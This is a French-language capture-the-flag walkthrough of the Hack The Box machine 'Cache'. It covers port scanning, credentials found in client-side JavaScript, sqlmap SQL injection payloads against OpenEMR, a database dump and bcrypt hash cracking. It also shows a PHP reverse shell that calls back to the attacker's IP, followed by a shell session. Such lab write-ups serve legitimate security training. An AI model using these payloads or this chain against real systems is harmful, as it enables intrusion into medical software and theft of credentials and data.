1. User
root@Host-001:~# nmap -sC -sV 10.10.10.188
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 10:12 CEST
Nmap scan report for 10.10.10.188
Host is up (0.089s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.70 seconds
Sur la page http://10.10.10.188/login.html avec l’inspecteur, écran debugger on trouve functionnality.js:
$(function(){
var error_correctPassword = false;
var error_username = false;
function checkCorrectPassword(){
var Password = $("#password").val();
if(Password != 'H@v3_fun'){
alert("Password didn't Match");
error_correctPassword = true;
}
}
function checkCorrectUsername(){
var Username = $("#username").val();
if(Username != "ash"){
alert("Username didn't Match");
error_username = true;
}
}
$("#loginform").submit(function(event) {
/* Act on the event */
error_correctPassword = false;
checkCorrectPassword();
error_username = false;
checkCorrectUsername();
if(error_correctPassword == false && error_username ==false){
return true;
}
else{
return false;
}
});
});
ash::H@v3_fun
On se log et on tombe sur http://10.10.10.188/net.html
Sur la page author on parle de HMS…
On modifie /etc/hosts
10.10.10.188 hms.htb
On se connecte à http://hms.htb
On tombe sur une page pour se loguer sur OpenEMR
‘OpenEMR est un logiciel de gestion de cabinet médical qui prend également en charge les dossiers médicaux électroniques. ‘ - Wikipedia
Plusieurs exploits connus pour OpenEMR dont un RCE (authentificated) et SQLi
SQLi, voir: https://www.youtube.com/watch?v=DJSQ8Pk_7hc&t=73s
Se rendre sur la page http://hms.htb/portal/ et cliquer sur register puis aller sur http://hms.htb/portal/add_edit_event_user.php?eid=1
Message:
Query Error
ERROR: query failed: SELECT facility_id as minId, facility FROM users WHERE id =
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
/var/www/hms.htb/public_html/portal/add_edit_event_user.php at 123:sqlQuery
Intercepter la requête avec Burp et l’enregistrer
root@Host-001:~/Bureau/htb/Cache# vim sqli.req
root@Host-001:~/Bureau/htb/Cache# cat sqli.req
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=191nknu8ddomaseol98be889ku; PHPSESSID=67mo10974t75foigcbjof9lcse
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
root@Host-001:~/Bureau/htb/Cache#
root@Host-001:~/Bureau/htb/Cache# sqlmap -r sqli.req --dbs --batch
___
__H__
___ ___[)]_____ ___ ___ {1.4.4#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:07:38 /2020-06-20/
[10:07:38] [INFO] parsing HTTP request from 'sqli.req'
[10:07:38] [INFO] resuming back-end DBMS 'mysql'
[10:07:38] [INFO] testing connection to the target URL
[10:07:38] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: eid=(SELECT (CASE WHEN (4390=4390) THEN 1 ELSE (SELECT 4655 UNION SELECT 8646) END))
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: eid=1 AND EXTRACTVALUE(1573,CONCAT(0x5c,0x7170767671,(SELECT (ELT(1573=1573,1))),0x71766a7a71))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: eid=1 AND (SELECT 2107 FROM (SELECT(SLEEP(5)))uTiN)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7170767671,0x536547556e76446b4a6662416e5474786571584c6567614d5174415753534f674a4c70646a637351,0x71766a7a71),NULL-- -
---
[10:07:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[10:07:38] [INFO] fetching database names
[10:07:38] [INFO] resumed: 'information_schema'
[10:07:38] [INFO] resumed: 'openemr'
available databases [2]:
[*] information_schema
[*] openemr
[10:07:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hms.htb'
[10:07:38] [WARNING] you haven't updated sqlmap for more than 78 days!!!
[*] ending @ 10:07:38 /2020-06-20/
root@Host-001:~/Bureau/htb/Cache#
root@Host-001:~/Bureau/htb/Cache# sqlmap -r sqli.req --threads=10 -D openemr --tables
(...)
transactions |
| user_settings |
| users |
| users_facility |
| users_secure |
| valueset |
| voids |
| x12_partners |
+---------------------------------------+
Il y a une table users_secure
root@Host-001:~/Bureau/htb/Cache# sqlmap -r sqli.req --threads=10 -D openemr -T users_secure --dump
___
__H__
___ ___[']_____ ___ ___ {1.4.4#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:09:14 /2020-06-20/
[10:09:14] [INFO] parsing HTTP request from 'sqli.req'
[10:09:14] [INFO] resuming back-end DBMS 'mysql'
[10:09:14] [INFO] testing connection to the target URL
[10:09:14] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: eid=(SELECT (CASE WHEN (4390=4390) THEN 1 ELSE (SELECT 4655 UNION SELECT 8646) END))
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: eid=1 AND EXTRACTVALUE(1573,CONCAT(0x5c,0x7170767671,(SELECT (ELT(1573=1573,1))),0x71766a7a71))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: eid=1 AND (SELECT 2107 FROM (SELECT(SLEEP(5)))uTiN)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7170767671,0x536547556e76446b4a6662416e5474786571584c6567614d5174415753534f674a4c70646a637351,0x71766a7a71),NULL-- -
---
[10:09:14] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[10:09:14] [INFO] fetching columns for table 'users_secure' in database 'openemr'
[10:09:15] [INFO] starting 9 threads
[10:09:15] [INFO] retrieved: 'id','bigint(20)'
[10:09:15] [INFO] retrieved: 'username','varchar(255)'
[10:09:15] [INFO] retrieved: 'salt_history1','varchar(255)'
[10:09:15] [INFO] retrieved: 'password_history2','varchar(255)'
[10:09:15] [INFO] retrieved: 'salt_history2','varchar(255)'
[10:09:15] [INFO] retrieved: 'password_history1','varchar(255)'
[10:09:15] [INFO] retrieved: 'last_update','timestamp'
[10:09:15] [INFO] retrieved: 'password','varchar(255)'
[10:09:15] [INFO] retrieved: 'salt','varchar(255)'
[10:09:15] [INFO] fetching entries for table 'users_secure' in database 'openemr'
[10:09:16] [INFO] retrieved: '1'
[10:09:16] [INFO] retrieved: '$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEc...
[10:09:16] [INFO] retrieved: '2019-11-21 06:38:40'
[10:09:16] [INFO] retrieved: ' '
[10:09:17] [INFO] retrieved: ' '
[10:09:17] [INFO] retrieved: '$2a$05$l2sTLIG6GTBeyBf7TAKL6A$'
[10:09:17] [INFO] retrieved: ' '
[10:09:17] [INFO] retrieved: ' '
[10:09:17] [INFO] retrieved: 'openemr_admin'
Database: openemr
Table: users_secure
[1 entry]
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| id | salt | username | password | last_update | salt_history1 | salt_history2 | password_history1 | password_history2 |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| 1 | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL | NULL | NULL | NULL |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
[10:09:17] [INFO] table 'openemr.users_secure' dumped to CSV file '/root/.sqlmap/output/hms.htb/dump/openemr/users_secure.csv'
[10:09:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hms.htb'
[10:09:17] [WARNING] you haven't updated sqlmap for more than 78 days!!!
[*] ending @ 10:09:17 /2020-06-20/
root@Host-001:~/Bureau/htb/Cache#
Crack du hash
root@Host-001:~/Bureau/htb/Cache# vim hash
root@Host-001:~/Bureau/htb/Cache# cat hash
$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
root@Host-001:~/Bureau/htb/Cache# john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (?)
1g 0:00:00:00 DONE (2020-06-20 10:12) 1.470g/s 1270p/s 1270c/s 1270C/s caitlin..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@Host-001:~/Bureau/htb/Cache#
root@Host-001:~/Bureau/htb/Cache# john --show hash
?:xxxxxx
1 password hash cracked, 0 left
root@Host-001:~/Bureau/htb/Cache#
le mdp est donc xxxxxx : openemr_admin::xxxxxx
On se connecte avec et on va dans Administration > Files, on sélectionne letter_templates/custom_pdf.php et on enregistre un reverse shell:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.127/1234 0>&1'");
php?>
Ref: https://0xss0rz.github.io/2020-05-10-Oneliner-shells/
On se rend sur http://hms.htb/sites/default/letter_templates/custom_pdf.php et on a un shell
root@Host-001:~/Bureau/htb/Cache# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.127] from (UNKNOWN) [10.10.10.188] 34866
bash: cannot set terminal process group (2023): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/sites/default/letter_templates$ python3 -c "import pty; pty.spawn('/bin/bash')"
<es$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@cache:/var/www/hms.htb/public_html/sites/default/letter_templates$ cd /home
<ublic_html/sites/default/letter_templates$ cd /home
www-data@cache:/home$ ls
ls
ash luffy
www-data@cache:/home$ su ash
su ash
Password: H@v3_fun
ash@cache:/home$ ls
ls
ash luffy
ash@cache:/home$ cd ash
cd ash
ash@cache:~$ ls
ls
Desktop Documents Downloads Music Pictures Public user.txt
ash@cache:~$ cat user.txt
cat user.txt
9201465e34e57c0c66c98225e6c63287
ash@cache:~$
Poursuivez avec :
This work is licensed under a Creative Commons Attribution 4.0 International License.